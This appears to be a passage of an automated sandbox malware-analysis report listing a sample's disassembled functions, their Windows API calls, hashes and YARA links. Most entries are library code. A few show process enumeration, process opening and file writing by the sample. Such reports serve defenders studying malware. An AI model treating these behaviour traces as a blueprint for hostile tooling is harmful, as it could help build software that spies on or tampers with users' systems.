                                                                                                                                                    APIs
                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,156DF234), ref: 156C93CF
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,156F2764,000000FF,00000000,0000003F,00000000,?,?), ref: 156C9447
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,156F27B8,000000FF,?,0000003F,00000000,?), ref: 156C9474
                                                                                                                                                    • _free.LIBCMT ref: 156C93BD
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156C9589
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1286116820-0
                                                                                                                                                    • Opcode ID: 0816486464d559584d8887b80d4450c7ad8f3c47f499a6c5eaa1d5dc789ca380
                                                                                                                                                    • Instruction ID: f8446af9ef7d52fdf68a03b3ad0e39ef800a3698a976ae7fb2dd018b005ac1ff
                                                                                                                                                    • Opcode Fuzzy Hash: 0816486464d559584d8887b80d4450c7ad8f3c47f499a6c5eaa1d5dc789ca380
                                                                                                                                                    • Instruction Fuzzy Hash: EC51B475D04219ABCB10DF69CC909AEB7BCFF45220B1146EBE455D7680EB30BA41CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
                                                                                                                                                      • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1568F91B
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 1568F93F
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 1568F94E
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1568FB05
                                                                                                                                                      • Part of subcall function 1569BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,1568F5F9,00000000,?,?,156F5338), ref: 1569BFFA
                                                                                                                                                      • Part of subcall function 1569BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,156F5338), ref: 1569C005
                                                                                                                                                      • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
                                                                                                                                                      • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 1568FAF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2180151492-0
                                                                                                                                                    • Opcode ID: 4b6c716ebd4f3667f6d123cd56a005170f3a088cb8889b19b4d554769ec492a4
                                                                                                                                                    • Instruction ID: a12b75412d74267ea4ce094884ab4d87c05c0d2e541d902b3cad97280502ab8d
                                                                                                                                                    • Opcode Fuzzy Hash: 4b6c716ebd4f3667f6d123cd56a005170f3a088cb8889b19b4d554769ec492a4
                                                                                                                                                    • Instruction Fuzzy Hash: 3C41273520A3459BC329DB21DC50AFFB3E9AFD4310F50491DE58A86294EF347A09C7DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C3DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: f0e5c4646ba0187dc6be7e88fe9843c121944b28910dc6fc903b50cac1f6a8b3
                                                                                                                                                    • Instruction ID: 42b91aa6fa72ccb41ca7de78dd098dafb844a7032f3098f4daf1755a528ff150
                                                                                                                                                    • Opcode Fuzzy Hash: f0e5c4646ba0187dc6be7e88fe9843c121944b28910dc6fc903b50cac1f6a8b3
                                                                                                                                                    • Instruction Fuzzy Hash: F2419E36F01214AFCB14CF78C880A5EB7B6FF89714B1545AAE915EB341DA71BA01CBC0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,156BF8C8,?,00000000,?,00000001,?,?,00000001,156BF8C8,?), ref: 156D1179
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 156D11B1
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 156D1202
                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,156BAE84,?), ref: 156D1214
                                                                                                                                                    • __freea.LIBCMT ref: 156D121D
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1857427562-0
                                                                                                                                                    • Opcode ID: b18e63aa1545c00b4c195d31234353da832579e42d56dea88a2519ebb966b9f5
                                                                                                                                                    • Instruction ID: 9d9ecd893b15f59629528d0f8ea7f84545f996e2cbabe19fdbe8eee814a38f1a
                                                                                                                                                    • Opcode Fuzzy Hash: b18e63aa1545c00b4c195d31234353da832579e42d56dea88a2519ebb966b9f5
                                                                                                                                                    • Instruction Fuzzy Hash: 1E31E375A0121AEBDF25CFA4CC80DAEBBA6EF40610F010568EC45D7690EB76E991CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CF35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 156CF363
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 156CF386
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 156CF3AC
                                                                                                                                                    • _free.LIBCMT ref: 156CF3BF
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 156CF3CE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2278895681-0
                                                                                                                                                    • Opcode ID: c34ff9d6e2f8fb878fb054f2854a0a0db1394392342194365842c2bc3d6ae370
                                                                                                                                                    • Instruction ID: 9ac4136cb02c49d169d938218ee0e6d04ab75fb61543580ba075d26c4c7f23f8
                                                                                                                                                    • Opcode Fuzzy Hash: c34ff9d6e2f8fb878fb054f2854a0a0db1394392342194365842c2bc3d6ae370
                                                                                                                                                    • Instruction Fuzzy Hash: B701D4736066297F672115BA5C8CCBFAA6DEAC6DB131106AEFC69C2640DF609D01C1F4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C44D
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C459
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,15686F85,00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C46A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,1569C510,00000000,00000000), ref: 1569C477
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1852769593-0
                                                                                                                                                    • Opcode ID: b37a02e72ba259ac8fade0600523c336ef6d40e2465b87c9ec33ba7d468b1851
                                                                                                                                                    • Instruction ID: 33e83a6c2f3d3e5559d48e0240a50aa4839f6401f4a41ec1b7ce405c3d582c0b
                                                                                                                                                    • Opcode Fuzzy Hash: b37a02e72ba259ac8fade0600523c336ef6d40e2465b87c9ec33ba7d468b1851
                                                                                                                                                    • Instruction Fuzzy Hash: 00118EB1314225BFF7088E29DC89EBB739EFB46A74F004B29F991C21C5CA219C05C6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15691163 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 15691170
                                                                                                                                                    • int.LIBCPMT ref: 15691183
                                                                                                                                                      • Part of subcall function 1568E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1568E0D2
                                                                                                                                                      • Part of subcall function 1568E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1568E0EC
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 156911C3
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 156911CC
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 156911EA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2536120697-0
                                                                                                                                                    • Opcode ID: e70386855990880781943a7ecc3904ecf2baa4d841b208333f956789c70be781
                                                                                                                                                    • Instruction ID: 858c58160ca15c4920d060efe342243bdecfb19209e24d8665733434ede2116d
                                                                                                                                                    • Opcode Fuzzy Hash: e70386855990880781943a7ecc3904ecf2baa4d841b208333f956789c70be781
                                                                                                                                                    • Instruction Fuzzy Hash: 0A11C67AB01218AFCB14EFA4EC548DDBB79AF51260B20055EE805A7290EF70BE40C7D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C8299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,156BBC87,00000000,?,?,156BBD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 156C829E
                                                                                                                                                    • _free.LIBCMT ref: 156C82D3
                                                                                                                                                    • _free.LIBCMT ref: 156C82FA
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 156C8307
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 156C8310
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                    • Opcode ID: 744accdd9eb699fad8fddecee443e069ebbe41d163cba56c132e5b5ed36f6f74
                                                                                                                                                    • Instruction ID: d4668d2bb1910a147b4b449f6bb05a77e2d98bf272eac4c9ff929800c4c047eb
                                                                                                                                                    • Opcode Fuzzy Hash: 744accdd9eb699fad8fddecee443e069ebbe41d163cba56c132e5b5ed36f6f74
                                                                                                                                                    • Instruction Fuzzy Hash: 0B01F93EB0575167C33196755CD8D4B251FEBC2271720059EFC19A2680EF34EC01C1E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEAA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA24
                                                                                                                                                      • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA54
                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 02DEAA5F
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA7D
                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 02DEAA88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                    • Opcode ID: cac1bc99c277f8d82401060a97a6aa11c12cd0f9e571650ee23f7f1030f97f50
                                                                                                                                                    • Instruction ID: edfb848079cea0857446917b9a9fe8657c89be7db6ab85e8fde97d8913baec8d
                                                                                                                                                    • Opcode Fuzzy Hash: cac1bc99c277f8d82401060a97a6aa11c12cd0f9e571650ee23f7f1030f97f50
                                                                                                                                                    • Instruction Fuzzy Hash: BC01F2713047896BFF02BA74DD12B5F72AEDB55720F910560F503AA7C0EA64EE008AB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 1569C228
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1569C233
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1569C23B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                    • Opcode ID: 1d7b9fa15bcfd941e5de534dc27a53fe9bb9c6087f9de8d92d8f29dd710bf434
                                                                                                                                                    • Instruction ID: 3ed1b871ca7c1ab1ef22e34b1fd4aeca2c22df67b27c14e02235483b24de7493
                                                                                                                                                    • Opcode Fuzzy Hash: 1d7b9fa15bcfd941e5de534dc27a53fe9bb9c6087f9de8d92d8f29dd710bf434
                                                                                                                                                    • Instruction Fuzzy Hash: E60126B16402296FE3149698CC88F6BF37DEB446A6F00011AFE88C31C5EF605C41C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D09BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156D09D4
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156D09E6
                                                                                                                                                    • _free.LIBCMT ref: 156D09F8
                                                                                                                                                    • _free.LIBCMT ref: 156D0A0A
                                                                                                                                                    • _free.LIBCMT ref: 156D0A1C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 7d1a97679c67a28937d5f10923a5e7b75cf71bbb5a1b0e59806c05a63ffc3442
                                                                                                                                                    • Instruction ID: 50146b28e6e40e552039792c44ede316b97467a86c464e4fe6d27131157d5b94
                                                                                                                                                    • Opcode Fuzzy Hash: 7d1a97679c67a28937d5f10923a5e7b75cf71bbb5a1b0e59806c05a63ffc3442
                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0FF3591E214A7C710DA6DE4D1C5AB3DDFA057A17909D4AF0AAE7902DE34FC80C6E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C4048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156C4066
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156C4078
                                                                                                                                                    • _free.LIBCMT ref: 156C408B
                                                                                                                                                    • _free.LIBCMT ref: 156C409C
                                                                                                                                                    • _free.LIBCMT ref: 156C40AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: fdf55e571f2c4ed481e06bf50ad61c06fe58148e0f7bf2169f7de3899b60419c
                                                                                                                                                    • Instruction ID: cb9728d1e5a47b72b3b16ca946bb9774761f69cd4c280f39dbb03ab29ede3871
                                                                                                                                                    • Opcode Fuzzy Hash: fdf55e571f2c4ed481e06bf50ad61c06fe58148e0f7bf2169f7de3899b60419c
                                                                                                                                                    • Instruction Fuzzy Hash: F2F0F975D2A1388FC7219F189CF04053669F709662354458FE42462670CF316E81CFEA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02E09D78 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 338threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE352C: GetKeyboardType.USER32(00000000), ref: 02DE3531
                                                                                                                                                      • Part of subcall function 02DE352C: GetKeyboardType.USER32(00000001), ref: 02DE353D
                                                                                                                                                    • GetCommandLineA.KERNEL32(2C02E1C5), ref: 02E0A06C
                                                                                                                                                    • GetACP.KERNEL32(2C02E1C5), ref: 02E0A080
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02E0A08A
                                                                                                                                                      • Part of subcall function 02DE355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE357E
                                                                                                                                                      • Part of subcall function 02DE355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35B1
                                                                                                                                                      • Part of subcall function 02DE355C: RegCloseKey.ADVAPI32(?,02DE35D4,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                                                    • String ID: p&y
                                                                                                                                                    • API String ID: 3316616684-1102576638
                                                                                                                                                    • Opcode ID: 31c50437d01c9b46613f37b24b16677ea172afa0b49c982aba2562f2957e131f
                                                                                                                                                    • Instruction ID: 3387fdcdc8b3a4376610a9d1cc6afdebee1be5e3106fab99de890f791707af9c
                                                                                                                                                    • Opcode Fuzzy Hash: 31c50437d01c9b46613f37b24b16677ea172afa0b49c982aba2562f2957e131f
                                                                                                                                                    • Instruction Fuzzy Hash: 4B415B5448E3C18FC713AF3658641543FB1AF07308B0A49C7DAC1CF2A7D22829AADB76
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

